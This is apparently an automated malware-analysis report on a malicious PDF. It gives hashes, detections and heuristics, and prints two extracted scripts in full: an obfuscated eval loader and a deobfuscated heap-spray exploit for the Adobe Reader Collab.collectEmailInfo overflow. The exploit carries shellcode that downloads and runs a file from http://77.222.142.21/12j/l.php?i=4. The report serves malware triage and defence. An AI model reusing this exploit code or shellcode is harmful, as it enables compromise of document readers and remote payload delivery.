Malicious PDF — malware analysis report

Static analysis result for SHA-256 5e590ab27109b81e…

MALICIOUS

PDF

2.3 KB
MD5: d1b7252b92590a942131e5e6765209be SHA-1: 98d519cc72b1f45947674dd89b5e26832aa5cd0f SHA-256: 5e590ab27109b81eeaf3975416256b7ed552c91ca9f18ce30dc77b8f7a1af288
358 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that utilizes eval() and unescape() functions, indicative of exploit code. Critical heuristics confirm the use of CVE-2007-5659 (Collab.collectEmailInfo) and a JavaScript exploit cluster. The deobfuscated JavaScript explicitly contains a URL, http://77.222.142.21/12j/l.php?i=4, which is highly likely to be used for downloading a secondary payload. The primary attack vector is likely spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • ClamAV: Pdf.Exploit.Agent-36082 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36082
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://77.222.142.21/12j/l.php?i=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111611_000.js
772da696bdb365f3f1eb4ea6af881baad391be62f3591b19f2f9827fcc4c9b53		 pdf-javascript-stream PDF /JS object 111611 at offset 0x848 479 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*//*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*/eval(/*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*//*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*/unescape(/*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*/this.subject.replace(/Hueputol/mig,String.fromCharCode(0x1E+0x7)).replace(/Dalbaeb/mig,'B')/*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*/)/*5njn18dfnj4n98nAt <Pgnjq ncyo3q> Vn3nj9njmSdqun4G*/);
legacy_pdfkit_stage_000.js
701019589815148d21713084dc3a000fe220062c580e3e3d1a4c25e3687999bf		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x189 2634 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len){while (yarsp.length * 2 < len){yarsp += yarsp;}yarsp = yarsp.substring(0, len / 2);return yarsp;}var mem_array = new Array();var cc = 0x0c0c0c0c;var addr = 0x400000;var payload = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u372f%u2e37%u3232%u2e32%u3431%u2e32%u3132%u312f%u6a32%u6c2f%u702e%u7068%u693f%u343d%u9000');var sc_len = payload.length * 2;var len = addr - (sc_len + 0x38);var yarsp = unescape('%u9090%u9090');yarsp = fix_it(yarsp, len);var count2 = (cc - 0x400000) / addr;for (var count = 0; count < count2; count ++ ){mem_array[count] = yarsp + payload;}var overflow = unescape('%u0c0c%u0c0c');while (overflow.length < 44952){overflow += overflow;}this.collabStore = Collab.collectEmailInfo({subj:'', msg:overflow});

Open this report in the interactive analyzer, or submit your own file for analysis.